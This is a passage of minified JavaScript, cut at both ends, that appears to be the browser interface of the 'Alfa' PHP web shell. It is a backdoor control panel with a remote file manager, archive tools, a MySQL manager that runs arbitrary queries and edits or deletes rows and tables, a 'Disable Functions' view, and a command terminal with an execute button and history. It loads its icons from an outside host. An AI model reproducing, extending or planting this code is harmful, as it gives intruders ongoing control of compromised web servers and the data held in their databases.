style="display:none;margin-left:20px;margin-top: 5px;"><input style="padding: 0;text-align:center;" type="text" placeholder="dump.sql" name="dump_file"></div></div>',t.innerHTML=r,d.querySelector("#"+a+" .cls-"+i+"-expander img").src="http://solevisible.com/icons/menu/b_minus.png"}function alfaMysqlQuery(e){var t=e.getAttribute("db_target"),a=e.getAttribute("db_id"),i=d.querySelector("#"+a+" textarea[name=query]").value;alfaMysqlApi({db_id:a,db_target:t,ajax_id:"mysql_load_query_data",db_info:{query:i},post:{alfa2:"query"}},function(e){0!=e.length&&(e=JSON.parse(e),alfaMysqlReportBuilder(a,e),d.querySelector("#"+a+" .mysql-query-table").innerHTML=e.status?e.table:"",alfaMysqlTabCtl({child:1,db_id:a,target:".mysql-query-result-content"},!0))})}function alfaMysqlReportBuilder(e,t){var a="";t.status||(a="<div><span>Error: </span><div style='padding-left: 50px;'><pre>"+t.error+"</pre></div></div>");var i="<div><span>Query:</span><div style='padding-left: 50px;'><pre>"+t.query+"</pre></div>"+a+"</div>";d.querySelector("#"+e+" .mysql-query-reporter").innerHTML=i}function alfaMysqlTablePanelCtl(e){var t=e.getAttribute("db_id"),a=(t=e.getAttribute("db_id"),d.querySelector("#"+t)),i=a.querySelector(".tables-panel-ctl");"none"==i.getAttribute("mode")?(a.querySelector(".mysql-tables").style.display="block",i.setAttribute("mode","block"),i.innerHTML="&#x3C;&#x3C;",a.querySelector(".mysql-query-results-fixed").classList.remove("mysql-query-results-fixed")):(a.querySelector(".mysql-tables").style.display="none",i.setAttribute("mode","none"),i.innerHTML="&#x3E;&#x3E;",a.querySelector(".mysql-query-results").classList.add("mysql-query-results-fixed")),i.classList.toggle("tables-panel-ctl-min")}function alfaMysqlTabCtl(e,t){var a=void 0===t?e.getAttribute("db_id"):e.db_id,i=void 0===t?e.getAttribute("target"):e.target;d.querySelectorAll("#"+a+" .mysql-query-content").forEach(function(e){e.classList.add("mysql-hide-content")}),d.querySelector("#"+a+" .mysql-query-result-tabs .mysql-query-selected-tab").classList.remove("mysql-query-selected-tab"),void 0===t?e.classList.add("mysql-query-selected-tab"):d.querySelector("#"+a+" .mysql-query-result-tabs div:nth-child("+e.child+")").classList.add("mysql-query-selected-tab"),d.querySelector("#"+a+" "+i).classList.remove("mysql-hide-content")}function alfaLoadTableData(e,t){var a=e.getAttribute("db_target"),i=e.getAttribute("db_id");alfaMysqlApi({db_id:i,db_target:a,ajax_id:"mysql_load_table_data",db_info:{table:t},post:{alfa2:"load_data"}},function(e){if(0!=e.length){e=JSON.parse(e);var l="",r="<table border='1'><tr style='text-align: left;background-color: #305b8e;color:#FFFFFF;'><th>Column</th><th>Type</th><th>Value</th></tr>",o="<table border='1'><tr style='text-align: left;background-color: #305b8e;color:#FFFFFF;'><th>Column</th><th>Type</th><th>Value</th><th>Change</th></tr>",n="<table border='1'><tr style='text-align: left;background-color: #305b8e;color:#FFFFFF;'><th>Column</th><th>Type</th><th>Collation</th><th>Operator</th><th>Value</th></tr>",s=["int","smallint","bigint","tinyint","mediumint"],c=["longtext","text","mediumtext","tinytext"];for(var u in e.columns){var p="text";-1!=s.indexOf(e.columns[u].data_type)&&(p="number"),n+="<tr><th style='text-align: left;'>"+e.columns[u].name+"</th><td>"+e.columns[u].type+"</td><td>"+e.columns[u].collation+"</td><td><select name='"+e.columns[u].name+"'><option value='='>=</option><option value='!='>!=</option><option value='>'>&gt;</option><option value='>='>&gt;=</option><option value='<'>&lt;</option><option value='<='>&lt;=</option><option value=\"= ''\">= ''</option><option value=\"!= ''\">!= ''</option><option value='LIKE'>LIKE</option><option value='LIKE %...%'>LIKE %...%</option><option value='NOT LIKE'>NOT LIKE</option><option value='REGEXP'>REGEXP</option><option value='REGEXP ^...$'>REGEXP ^...$</option><option value='NOT REGEXP'>NOT REGEXP</option><option value='IN (...)'>IN (...)</option><option value='NOT IN (...)'>NOT IN (...)</option><option value='BETWEEN'>BETWEEN</option><option value='NOT BETWEEN'>NOT BETWEEN</option><option value='IS NULL'>IS NULL</option><option value='IS NOT NULL'>IS NOT NULL</option></select></td><td><input type='"+p+"' name='"+e.columns[u].name+"'></td></tr>";var f=alfaMysqlLoadDataType(e.columns[u].data_type);null==e.columns[u].type_value&&(e.columns[u].type_value=""),o+="<tr><th style='text-align: left;'>"+e.columns[u].name+"</th><td><select name='sel_"+e.columns[u].name+"'>"+f+"</select></td><td><input name='value_"+e.columns[u].name+"' type='text' value='"+(-1==c.indexOf(e.columns[u].data_type)?e.columns[u].type_value:"")+"'></td><td><button col_name='"+e.columns[u].name+"' tbl_name='"+t+"' db_id='"+i+"' db_target='"+a+"' onclick='alfaMysqlAlterTbl(this);return false;'>Change</button></td></tr>";var m="";switch(e.columns[u].data_type){case"longtext":case"text":m="<textarea name='"+e.columns[u].name+"' rows='5'></textarea>";break;case"int":case"smallint":case"bigint":m="<input type='number' name='"+e.columns[u].name+"' value=''>";break;default:m="<input type='text' name='"+e.columns[u].name+"' value=''>"}r+="<tr><th style='text-align: left;'>"+e.columns[u].name+"</th><td>"+e.columns[u].type+"</td><td>"+m+"</td></tr>"}if(r+="</table><div style='margin-left:20px;'><button tbl_name='"+t+"' db_id='"+i+"' db_target='"+a+"' onclick='alfaMysqlUpdateRow(this, \"insert\");return false;'>Insert</button></div><div class='mysql-insert-result'></div>",o+="</table><div class='mysql-structure-qres'></div>",n+="</table><div style='padding-left: 384px;margin-top: 15px;'><button tbl_name='"+t+"' db_id='"+i+"' db_target='"+a+"' onclick='alfaMysqlSearch(this);return false;'>Search</button></div>",e.pages>0){l+="<span style='cursor:pointer;' db_id='"+i+"' onclick='alfaMysqlChangePage(this,1);'><<</span> <span> page: </span> <select tbl_name='"+t+"' db_target='"+a+"' name='mysql-q-pages' db_id='"+i+"' class='db-opt-id' onchange='alfaMysqlChangePage(this);' pages='"+e.pages+"'>";for(var b=1;b<e.pages+1;b++)l+="<option>"+b+"</option>";l+="</select><span> Of "+e.pages+"</span> <span style='cursor:pointer;' db_id='"+i+"' onclick='alfaMysqlChangePage(this,2);'>>></span>"}var y=d.querySelector("#"+i);y.querySelector(".mysql-search-area").innerHTML=n,y.querySelector(".mysql-insert-row").innerHTML=r,y.querySelector(".mysql-edit-row").innerHTML="",y.querySelector(".mysql-structure").innerHTML=o,y.querySelector(".mysql-query-result-header .mysql-query-pager").innerHTML=l,y.querySelector(".mysql-query-table").innerHTML=e.status?e.table:"",alfaMysqlTabCtl({child:1,db_id:i,target:".mysql-query-result-content"},!0),d.querySelector("#"+i+" .mysql-query-result-tabs div:nth-child(6)").style.display="none",alfaMysqlReportBuilder(i,e)}})}function alfaMysqlAlterTbl(e){var t=e.getAttribute("db_target"),a=e.getAttribute("db_id"),i=d.querySelector("#"+a),l=e.getAttribute("tbl_name"),r=e.getAttribute("col_name"),o={};o.type=i.querySelector(".mysql-structure select[name=sel_"+r+"]").value,o.input=i.querySelector(".mysql-structure input[name=value_"+r+"]").value,alfaMysqlApi({db_id:a,db_target:t,ajax_id:"mysql_table_alter",db_info:{table:l,column:r,alter:o},post:{alfa2:"alter"}},function(e){var t=d.querySelector("#"+a+" .mysql-structure-qres");t.innerHTML=e,t.style.display="block"})}function alfaMysqlSearch(e){var t=e.getAttribute("db_target"),a=e.getAttribute("db_id"),i=d.querySelector("#"+a),l=e.getAttribute("tbl_name"),r={};i.querySelectorAll(".mysql-search-area input, .mysql-search-area select").forEach(function(e){r.hasOwnProperty(e.name)||(r[e.name]={}),"SELECT"==e.tagName?r[e.name].opt=e.value:r[e.name].value=e.value}),alfaMysqlApi({db_id:a,db_target:t,ajax_id:"mysql_table_search_query",db_info:{table:l,search:r},post:{alfa2:"search"}},function(e){0!=e.length&&(e=JSON.parse(e),alfaMysqlReportBuilder(a,e),alfaMysqlTabCtl({child:1,db_id:a,target:".mysql-query-result-content"},!0),d.querySelector("#"+a+" .mysql-query-table").innerHTML=e.table)})}function alfaMysqlEditRow(e,t){var a=e.getAttribute("db_target"),i=e.getAttribute("db_id"),l=(d.querySelector("#"+i),e.getAttribute("col_key")),r=e.getAttribute("key"),o=e.getAttribute("tbl_name"),n=e.getAttribute("row_id");alfaMysqlApi({db_id:i,db_target:a,ajax_id:"mysql_table_edit_query",db_info:{table:o,col_key:l,key:r},post:{alfa2:t}},function(e){if(0!=e.length)if(e=JSON.parse(e),"edit"==t){var s="<table border='1'><tr style='text-align: left;background-color: #305b8e;color:#FFFFFF;'><th>Column</th><th>Type</th><th>Value</th></tr>";for(var c in e){var u="";switch(e[c].type.tag){case"textarea":u="<textarea name='"+e[c].col+"' rows='5'>"+e[c].value+"</textarea>";break;case"input":u="<input type='"+e[c].type.type+"' name='"+e[c].col+"' value='"+e[c].value+"'>"}s+="<tr><th style='text-align: left;'>"+e[c].col+"</th><td>"+e[c].type.col_type+"</td><td>"+u+"</td></tr>"}s+="</table><div style='margin-left:20px;'><button col_key='"+l+"' key='"+r+"' tbl_name='"+o+"' db_id='"+i+"' db_target='"+a+"' onclick='alfaMysqlUpdateRow(this, \"edit\");return false;'>Update</button></div><div class='mysql-update-result'></div>",d.querySelector("#"+i+" .mysql-edit-row").innerHTML=s,alfaMysqlTabCtl({child:6,db_id:i,target:".mysql-edit-row"},!0),d.querySelector("#"+i+" .mysql-query-result-tabs div:nth-child(6)").style.display="inline-block"}else"delete"==t&&(e.status?d.querySelector("#"+i+" .tbl_row_l"+n).remove():alert(e.error))})}function alfaMysqlTblSelectAll(e){var t=e.getAttribute("db_id");d.querySelectorAll("#"+t+" .mysql-main input[name=tbl_rows_checkbox\\[\\]]").forEach(function(t){t.checked=e.checked})}function alfaMysqlDeleteAllSelectedrows(e){var t=e.getAttribute("db_id"),a=e.getAttribute("db_target"),i=e.getAttribute("col_key"),l=e.getAttribute("tbl_name"),r=[];if(d.querySelectorAll("#"+t+" .mysql-main input[name=tbl_rows_checkbox\\[\\]]").forEach(function(e){e.checked&&r.push(e.value)}),0==r.length)return!1;alfaMysqlApi({db_id:t,db_target:a,ajax_id:"mysql_table_delete_all_query",db_info:{table:l,col_key:i,rows:r},post:{alfa2:"delete_all"}},function(e){if(""!=e)if((e=JSON.parse(e)).status){var a=0,i=d.querySelector("#"+t);d.querySelectorAll("#"+t+" .mysql-main input[name=tbl_rows_checkbox\\[\\]]").forEach(function(e){e.checked&&(a=e.getAttribute("row_id"),i.querySelector(".tbl_row_l"+a).remove())})}else alert(e.error)})}function alfaMysqlUpdateRow(e,t){var a=e.getAttribute("db_target"),i=e.getAttribute("db_id"),l=d.querySelector("#"+i),r=".mysql-insert-row",o=".mysql-insert-result",n="mysql_table_insert_query",s="insert",c={table:e.getAttribute("tbl_name")};if("edit"==t){var u=e.getAttribute("col_key"),p=e.getAttribute("key");r=".mysql-edit-row",o=".mysql-update-result",n="mysql_table_update_query",s="update",c.col_key=u,c.key=p}var f={};l.querySelectorAll(r+" input, "+r+" textarea").forEach(function(e){f.hasOwnProperty(e.name)||(f[e.name]={}),f[e.name]=e.value}),c.data=f,alfaMysqlApi({db_id:i,db_target:a,ajax_id:n,db_info:c,post:{alfa2:s}},function(e){if(0!=e.length){e=JSON.parse(e);var t=d.querySelector("#"+i+" "+o);t.style.display="block",e.status?t.innerHTML="Success...":t.innerHTML=e.error}})}function alfaMysqlLoadDataType(e){e=e.toUpperCase();var t=["INT","VARCHAR","TEXT","DATE",{key:"Numeric",vals:["TINYINT","SMALLINT","MEDIUMINT","INT","BIGINT","-","DECIMAL","FLOAT","DOUBLE","REAL","-","BIT","BOOLEAN","SERIAL"]},{key:"Date and time",vals:["DATE","DATETIME","TIMESTAMP","TIME","YEAR"]},{key:"String",vals:["CHAR","VARCHAR","-","TINYTEXT","TEXT","MEDIUMTEXT","LONGTEXT","-","BINARY","VARBINARY","-","TINYBLOB","MEDIUMBLOB","BLOB","LONGBLOB","-","ENUM","SET"]},{key:"Spatial",vals:["GEOMETRY","POINT","LINESTRING","POLYGON","MULTIPOINT","MULTILINESTRING","MULTIPOLYGON","GEOMETRYCOLLECTION"]},{key:"JSON",vals:["JSON"]}],a="",i=!1;for(var l in t)if("object"==typeof t[l]){for(var r in a+='<optgroup label="'+t[l].key+'">',t[l].vals)a+="<option"+(t[l].vals[r]!=e||i?"":" selected")+">"+t[l].vals[r]+"</option>",t[l].vals[r]==e&&(i=!0);a+="</optgroup>"}else a+="<option"+(t[l]!=e||i?"":" selected")+">"+t[l]+"</option>",t[l]==e&&(i=!0);return a}function alfaMysqlChangePage(e,t){var a=e.getAttribute("db_id"),i=0;if(void 0!==t){e=d.querySelector("#"+a+" select[name=mysql-q-pages]");var l=parseInt(e.getAttribute("pages"));if(i=parseInt(e.value),1==t?--i:++i,0==i||l<i)return!1;e.value=i}else i=e.value;var r=e.getAttribute("db_target"),o=e.getAttribute("tbl_name");alfaMysqlApi({db_id:a,db_target:r,ajax_id:"mysql_table_change_page",db_info:{table:o,page:i},post:{alfa2:"page"}},function(e){0!=e.length&&(e=JSON.parse(e),alfaMysqlReportBuilder(a,e),d.querySelector("#"+a+" .mysql-query-table").innerHTML=e.table)})}function alfaRemoveCookie(e){document.cookie=e+"=;Max-Age=0; path=/;"}function alfaLogOut(){alfaRemoveCookie("AlfaUser"),alfaRemoveCookie("AlfaPass"),location.reload()}var alfaAlertBox=function(e,t){this.types={success:{class:"alert-success",icon:"http://solevisible.com/icons/menu/check-mark1.svg"},error:{class:"alert-error",icon:"http://solevisible.com/icons/menu/warning.svg"}},this.show=function(a){if(""===a||null==a)throw'"msg parameter is empty"';var i=document.querySelector(e),l=document.createElement("DIV"),r=document.createElement("DIV"),o=document.createElement("DIV"),n=document.createElement("A"),s=document.createElement("div"),c=document.createElement("IMG"),d=this;if(s.style.display="inline-block",s.style.marginRight="10px",r.style.display="inline-block",o.classList.add("alert-content"),o.innerText=a,n.classList.add("alert-close"),n.setAttribute("href","#"),l.classList.add("alert-box"),c.src=this.types[t.type].icon,c.style.width="30px",s.appendChild(c),l.appendChild(s),t.hasOwnProperty("title")){var u=document.createElement("DIV");u.classList.add("alert-content-title"),u.innerText=t.title,r.appendChild(u)}if(r.appendChild(o),l.appendChild(r),t.hideCloseButton&&void 0!==t.hideCloseButton||l.appendChild(n),t.hasOwnProperty("type")&&l.classList.add(this.types[t.type].class),i.appendChild(l),n.addEventListener("click",function(e){e.preventDefault(),d.hide(l)}),!t.persistent)var p=setTimeout(function(){d.hide(l),clearTimeout(p)},t.closeTime)},this.hide=function(e){e.classList.add("hide");var t=setTimeout(function(){e.parentNode.removeChild(e),clearTimeout(t)},500)}};function alfaShowNotification(e,t,a,i,l){void 0===a&&(a="success"),void 0===i&&(i=!1),void 0===l&&(l=1e4);var r={closeTime:l,persistent:i,type:a,hideCloseButton:!1};void 0!==t&&(r.title=t),new alfaAlertBox("#alert-area",r).show(e)}function alfaSyncMenuToOpt(e,t){var a="",i="",l=null;void 0!==t?(a="view_archive",i=e,l=location):(a=e.name,i=e.getAttribute("fname"),l=e),"extract"==a?(alfa_can_add_opt=!0,l.href="#action=options&path="+c_+"&opt=deziper",g("deziper",null,"","",c_+"/"+i),d.querySelector(".opt-title").innerHTML="DeCompressor"):"compress"==a?(alfa_can_add_opt=!0,l.href="#action=options&path="+c_+"&opt=ziper",g("ziper",null,"","",c_+"/"+i),d.querySelector(".opt-title").innerHTML="Compressor"):"view_archive"==a&&(alfa_can_add_opt=!0,l.href="#action=options&path="+c_+"&opt=archive_manager",g("archive_manager",null,"",c_+"/"+i,""),d.querySelector(".opt-title").innerHTML="Archive Manager")}function doFilterName(e){var t="#filesman_holder_"+alfa_current_fm_id;setTimeout(function(){var a=new RegExp(e.value,"i");d.querySelectorAll(t+" .fmanager-row").forEach(function(e){-1==e.querySelector(".main_name").getAttribute("fname").search(a)?e.style.display="none":e.style.display="table-row"})},100)}function sortBySelectedValue(e,t){setCookie(t,e.options[e.selectedIndex].value,2012),g("FilesMan",c_)}function loadPopUpDatabase(e,t,a){if(console.log(t),$("database_window").style.display="block",void 0===t){try{d.querySelector(".sql-content.sql-active-content").classList.remove("sql-active-content")}catch(e){}try{d.querySelector(".sql-tabname.sql-active-tab").classList.remove("sql-active-tab")}catch(e){}try{d.querySelector(".sql-tabs .sql-newtab").remove()}catch(e){}var i="id_db_"+getRandom(10);d.querySelector("#database_window .content_options_holder .sql-contents").insertAdjacentHTML("afterbegin",'<div id="'+i+'" class="sql-content sql-active-content">'+e+"</div>"),d.querySelector("#database_window .content_options_holder .sql-tabs").insertAdjacentHTML("beforeend",'<div id="tab_'+i+'" opt_id="'+i+'" class="sql-tabname sql-active-tab" onclick="dbTabController(this);"><span style="font-weight:unset;">New DB Connection</span> <img opt_id="'+i+'" onclick="closeDatabase(this,event);return false;" title="[close]" src="http://solevisible.com/icons/menu/delete.svg"></div><div class="sql-newtab" onclick="alfa_can_add_opt=true;g(\'sql\',null,\'\',\'\',\'\');" style="background-color:#800000;"><span style="font-weight:unset;">New Tab +</span></div>'),$(i).querySelectorAll(".db-opt-id").forEach(function(e){e.setAttribute("db_id",i)});try{$(i).querySelector(".getconfig").setAttribute("base_id",i)}catch(e){}return i}$(t).innerHTML=e;var l=$("tab_"+t);null!=l&&((-1==l.classList.value.indexOf("sql-active-tab")||database_window_is_minimized)&&(l.classList.add("tab-is-done"),alfaShowNotification("proccess is done...","DB: "+l.innerText)),database_window_is_minimized&&alfaUpdateOptionsBadge("database_window")),void 0!==mysql_cache[t]&&mysql_cache[t].hasOwnProperty("db")&&mysql_cache[t].db.length>0&&"update"!=a&&(d.querySelector("#tab_"+t+">span").innerHTML=mysql_cache[t].db),$(t).querySelectorAll(".db-opt-id").forEach(function(e){e.setAttribute("db_id",t)});try{$(t).querySelector(".getconfig").setAttribute("base_id",t)}catch(e){}database_window_is_minimized||(d.body.style.overflow="hidden")}function loadPopUpOpTions(e,t){console.log(e),alfa_before_do_action_id="",$("options_window").style.display="block";var a=$("option_"+e);if(alfa_can_add_opt){alfa_can_add_opt=!1;try{d.querySelector(".options_holder.option_is_active").classList.remove("option_is_active")}catch(e){}var i="",l=$("menu_opt_"+e).innerHTML;"market"==e?l="Alfa Market":"GetDisFunc"==e&&(l="Disable Functions");try{d.querySelector("#options_window .content_options_holder .options_tab .tab_name.tab_is_active").classList.remove("tab_is_active")}catch(e){}if(null!=a){var r=a.getAttribute("opt_count");null!=r?(i=parseInt(r)+1,a.setAttribute("opt_count",i)):(i=1,a.setAttribute("opt_count",i))}var o="option_"+e+i;d.querySelector("#options_window .content_options_holder .options_content").insertAdjacentHTML("afterbegin",'<div id="'+o+'" class="options_holder">'+t+"</div>"),d.querySelector("#options_window .content_options_holder .options_tab").insertAdjacentHTML("beforeend",'<div opt_id="'+o+'" onclick="optionsTabController(this);" title="'+l+'" id="tab_'+o+'" class="tab_name tab_is_active">'+l+' <img opt_id="'+o+'" onclick="closeOption(this,event);return false;" title="[close]" src="http://solevisible.com/icons/menu/delete.svg"></div>'),$(o).classList.toggle("option_is_active"),d.querySelectorAll("#"+o+" form, #"+o+" a").forEach(function(t){var a=t.classList.value;if("getconfig"==a||"rejectme"==a)return!1;if("FORM"==t.tagName){var l=t.getAttribute("onsubmit");t.setAttribute("onsubmit",'alfaBeforeDoAction("'+e+i+'");'+l),t.setAttribute("opt_id",e+i)}else{l=t.getAttribute("onclick");t.setAttribute("onclick",'alfaBeforeDoAction("'+e+i+'");'+l)}});try{$(o).querySelector(".getconfig").setAttribute("base_id",e+i)}catch(e){}return e+i}a.innerHTML=t;var n=$("tab_option_"+e);null!=n&&((-1==n.classList.value.indexOf("tab_is_active")||options_window_is_minimized)&&(n.classList.add("tab-is-done"),alfaShowNotification("proccess is done...",n.innerText)),options_window_is_minimized&&alfaUpdateOptionsBadge("options_window")),d.querySelectorAll("#option_"+e+" form, #option_"+e+" a").forEach(function(t){var a=t.classList.value;if("getconfig"==a||"rejectme"==a)return!1;if("FORM"==t.tagName){var i=t.getAttribute("onsubmit");t.setAttribute("onsubmit",'alfaBeforeDoAction("'+e+'");'+i),t.setAttribute("opt_id",e)}else{i=t.getAttribute("onclick");t.setAttribute("onclick",'alfaBeforeDoAction("'+e+'");'+i)}});try{a.querySelector(".getconfig").setAttribute("base_id",e)}catch(e){}options_window_is_minimized||(d.body.style.overflow="hidden")}function alfaBeforeDoAction(e){alfa_before_do_action_id=e}function alfaLoaderOnTop(e){$("a_loader").style.display=e,d.body.style.overflow="block"==e?"hidden":"visible"}function alfaAjaxController(e){var t=e.getAttribute("parent");$("loader_"+t).remove(),"filesman_holder"==t.substr(0,15)&&($(t).style.minHeight="0"),_ALFA_AJAX_.hasOwnProperty(t)&&_ALFA_AJAX_[t].abort()}function closeDatabase(e,t){t.stopPropagation();var a=e.getAttribute("opt_id");if($(a).remove(),-1!=$("tab_"+a).classList.value.indexOf("sql-active-tab"))if((e=d.querySelectorAll(".sql-tabs .sql-tabname")).length>1){e[0].classList.add("sql-active-tab");var i=e[0].getAttribute("opt_id");null!=$(i)&&$(i).classList.toggle("sql-active-content")}else editorClose("database_window");d.querySelector("div[opt_id="+a+"]").remove()}function closeFmTab(e,t){t.stopPropagation();var a=e.getAttribute("fm_id"),i=$("filesman_tab_"+a);if(-1!=i.classList.value.indexOf("filesman-tab-active")&&(e=d.querySelectorAll("#filesman_tabs .filesman_tab")).length>1){e[0].classList.add("filesman-tab-active");var l=e[0].getAttribute("fm_id"),r="filesman_holder_"+l;if(null!=$(r)){$(r).classList.toggle("filesman-active-content");var o=$("filesman_tab_"+l).getAttribute("path");initDir(o),d.mf.c.value=o,alfa_current_fm_id=l}}i.remove(),$("filesman_holder_"+a).remove(),alfaFilesmanTabHideTitle()}function closeOption(e,t){t.stopPropagation();var a=e.getAttribute("opt_id");if($(a).remove(),-1!=$("tab_"+a).classList.value.indexOf("tab_is_active"))if((e=d.querySelectorAll(".options_tab .tab_name")).length>1){e[0].classList.add("tab_is_active");var i=e[0].getAttribute("opt_id");null!=$(i)&&$(i).classList.toggle("option_is_active")}else editorClose("options_window");d.querySelector("div[opt_id="+a+"]").remove()}function historyPanelController(e){"hidden"==e.getAttribute("mode")?(d.querySelector(".editor-explorer").style.display="block",d.querySelector(".editor-modal").style.marginLeft="20%",e.setAttribute("mode","visible"),e.style.left="19%",e.innerHTML="<<"):(d.querySelector(".editor-explorer").style.display="none",d.querySelector(".editor-modal").style.marginLeft="1%",e.setAttribute("mode","hidden"),e.style.left="0%",e.innerHTML=">>")}function closeTerminalContent(e,t){t.stopPropagation();var a=e.getAttribute("term_id");if(($(a).remove(),-1!=$("tab_"+a).classList.value.indexOf("active-terminal-tab"))&&(e=d.querySelectorAll(".terminal-tabs .terminal-tab")).length>1){e[0].classList.add("active-terminal-tab");var i=e[0].getAttribute("term_id");null!=$(i)&&$(i).classList.toggle("active-terminal-content")}d.querySelector("div[term_id="+a+"]").remove()}function closeEditorContent(e,t){t.stopPropagation();var a=e.getAttribute("opt_id");if(($(a).remove(),-1!=$("tab_"+a).classList.value.indexOf("editor-tab-active"))&&(e=d.querySelectorAll(".editor-tabs .editor-tab-name")).length>1){e[0].classList.add("editor-tab-active");var i=e[0].getAttribute("opt_id");null!=$(i)&&$(i).classList.toggle("editor-content-active")}d.querySelector("div[opt_id="+a+"]").remove()}function optionsTabController(e){try{d.querySelector(".options_holder.option_is_active").classList.remove("option_is_active")}catch(e){}var t=e.getAttribute("opt_id");if(null==t)return!1;$(t).classList.toggle("option_is_active");try{d.querySelector("#options_window .content_options_holder .options_tab \t.tab_name.tab_is_active").classList.remove("tab_is_active")}catch(e){}e.classList.remove("tab-is-done"),e.classList.add("tab_is_active"),d.querySelector(".opt-title").innerHTML=e.getAttribute("title"),alfaUpdateOptionsBadge("options_window")}function terminalTabController(e){try{d.querySelector(".terminal-tab.active-terminal-tab").classList.remove("active-terminal-tab")}catch(e){}try{d.querySelector(".terminal-content.active-terminal-content").classList.remove("active-terminal-content")}catch(e){}var t=e.getAttribute("term_id");if(null==t)return!1;$(t).classList.toggle("active-terminal-content"),e.classList.remove("tab-is-done"),e.classList.add("active-terminal-tab"),$(t).querySelector(".php-terminal-input").focus(),alfaUpdateOptionsBadge("cgiloader")}function filesmanTabController(e){try{d.querySelector(".ajaxarea.filesman-active-content").classList.remove("filesman-active-content")}catch(e){}try{d.querySelector(".filesman_tab.filesman-tab-active").classList.remove("filesman-tab-active")}catch(e){}var t=e.getAttribute("fm_id");if(null==t)return!1;alfa_current_fm_id=t,e.classList.add("filesman-tab-active"),e.classList.remove("tab-is-done"),$("filesman_holder_"+t).classList.toggle("filesman-active-content");var a=e.getAttribute("path");initDir(a),d.mf.c.value=a}function dbTabController(e){try{d.querySelector(".sql-content.sql-active-content").classList.remove("sql-active-content")}catch(e){}try{d.querySelector(".sql-tabname.sql-active-tab").classList.remove("sql-active-tab")}catch(e){}var t=e.getAttribute("opt_id");if(null==t)return!1;$(t).classList.toggle("sql-active-content"),e.classList.remove("tab-is-done"),e.classList.add("sql-active-tab"),alfaUpdateOptionsBadge("database_window")}function editorTabController(e,t){try{d.querySelector(".editor-contents.editor-content-active").classList.remove("editor-content-active")}catch(e){}var a=null;void 0===t?a=e.getAttribute("opt_id"):(a=e,e=$("tab_"+a));var i=editor_files["file_"+a.replace("editor_source_","")];if(void 0!==i&&(d.querySelector(".editor-path").innerHTML=(i.pwd+"/"+i.file).replace(/\/\//g,"/")),null==a)return!1;$(a).classList.toggle("editor-content-active");try{d.querySelector(".editor-tabs .editor-tab-name.editor-tab-active").classList.remove("editor-tab-active")}catch(e){}e.classList.remove("tab-is-done"),e.classList.add("editor-tab-active"),alfaUpdateOptionsBadge("editor")}function alfaUpdateOptionsBadge(e){var t=d.querySelector("#"+e+"-minimized .options_min_badge");if(null!=t){var a=d.querySelectorAll("#"+e+" .tab-is-done").length;t.innerHTML=a,t.style.visibility=a>0?"visible":"hidden"}}function alfaOpenPhpTerminal(e){if(php_temrinal_using_cgi&&void 0===e)showEditor("cgiloader");else{$("cgiloader").style.display="block",$("cgiloader").style.background="rgba(0, 0, 0, 0.57)",$("cgiframe").style.background="rgba(0, 0, 0, 0.81)",$("cgiframe").style.border="1px solid rgb(30, 86, 115)",$("cgiframe").style.height="90%",$("cgiframe").style.padding="3px",d.querySelector("#cgiloader .opt-title").innerHTML="Terminal";var t="",a="",i="terminal_id_"+getRandom(10);void 0===e&&(t=" active-terminal-content",a=" active-terminal-tab"),d.querySelector("#cgiframe .terminal-contents").insertAdjacentHTML("afterbegin",'<div id="'+i+'" class="terminal-content'+t+'"><div class="php-terminal-output"><div><button class="terminal-btn-fontctl" onClick="changeTerminalFontSize(\''+i+'\',1);">+</button><button class="terminal-btn-fontctl" onClick="changeTerminalFontSize(\''+i+"',0);\">-</button><input onchange=\"alfaTerminalChangecolor(this,'"+i+'\');" style="height: 18px;background: #dde2e2;" type="color"></div><pre class="ml1" style="border:unset;height: 90%;"></pre></div><div><form term_id="'+i+'" onSubmit="alfaExecTerminal(this);this.c.value=\'\';return false;" autocomplete="off" style="margin-top: 10px;"><div style="overflow: auto;white-space: nowrap;"><div style="display: inline-block;color:#4fbec3;margin-bottom:5px;margin-right:5px;">CWD:~# </div><div style="display: inline-block;color:#42ec42;" class="php-terminal-current-dir"></div></div><div style="position:relative;"><span style="color: #00ff08;font-size: 25px;">$ </span><input style="padding: 8px;font-size: 20px;width: 67%;border: 1px solid #27979B;padding-right:35px;" onkeyup="alfaWalkInTerminalHistory(this,event,\''+i+'\');" term_id="'+i+'" class="php-terminal-input" type="text" name="c" onfocus="closeHistoryCmd(\'free\',this);" placeholder="ls -la"><button class="button" style="color: #27979B;padding: 12px;margin-left: 10px;border-radius: 2px;font-weight: bolder;">ExeCute<button term_id="'+i+'" class="button" style="color: #27979B;padding: 12px;margin-left: 10px;border-radius: 2px;font-weight: bolder;" onClick="alfaExecTerminal(this, 1);return false;">Current Dir</button><div class="cmd-history-holder"><div class="commands-history-header">History</div><span onClick="clearTerminalHistory();" style="border-bottom: 1px solid;margin-bottom: 5px;display: inline-block;padding: 5px;color: #59de69;cursor: pointer;">Clear history</span><div style="overflow: auto;height: 82%;" class="commands-history"></div></div><div term_id="'+i+'" class="cmd-history-icon" mode="" onclick="closeHistoryCmd(this);"><img style="width:27px;" src="http://solevisible.com/icons/menu/time2.svg"></div></form></div></div></div>');try{$("terminal_new_tab").remove()}catch(e){}d.querySelector("#cgiframe .terminal-tabs").insertAdjacentHTML("beforeend",'<div onclick="terminalTabController(this);" term_id="'+i+'" id="tab_'+i+'" class="terminal-tab'+a+'">Terminal <img term_id="'+i+'" onclick="closeTerminalContent(this,event);return false;" title="[close]" src="http://solevisible.com/icons/menu/delete.svg"></div>'),d.querySelector("#cgiframe .terminal-tabs").insertAdjacentHTML("beforeend",'<div onclick="alfaOpenPhpTerminal(true);" id="terminal_new_tab" style="background-color:#800000;" class="terminal-tab">New Tab +</div>'),terminal_walk_index[i]={index:0,key:-1},d.querySelector("#"+i+" .php-terminal-input").focus(),d.querySelector("#"+i+" .php-terminal-current-dir").innerHTML=c_,d.querySelector("#cgiloader-minimized .minimized-text").innerHTML="Terminal",alfaTerminalSetColorAndSize(i),php_temrinal_using_cgi=!0;var l=alfaGetTerminalHistory();for(var r in l)d.querySelector("#"+i+" .cmd-history-holder .commands-history").insertAdjacentHTML("afterbegin","<div onclick=\"d.querySelector('#"+i+' .php-terminal-input\').value = this.innerHTML;" class="history-cmd-line">'+l[r]+"</div>")}d.body.style.overflow="hidden"}function alfaTerminalSetColorAndSize(e){var t=getCookie("alfa-terminal-color"),a=getCookie("alfa-terminal-fontsize");void 0!==t&&(d.querySelector("#"+e+" pre.ml1").style.color=t),void 0!==a&&(d.querySelector("#"+e+" pre.ml1").style.fontSize=a)}function 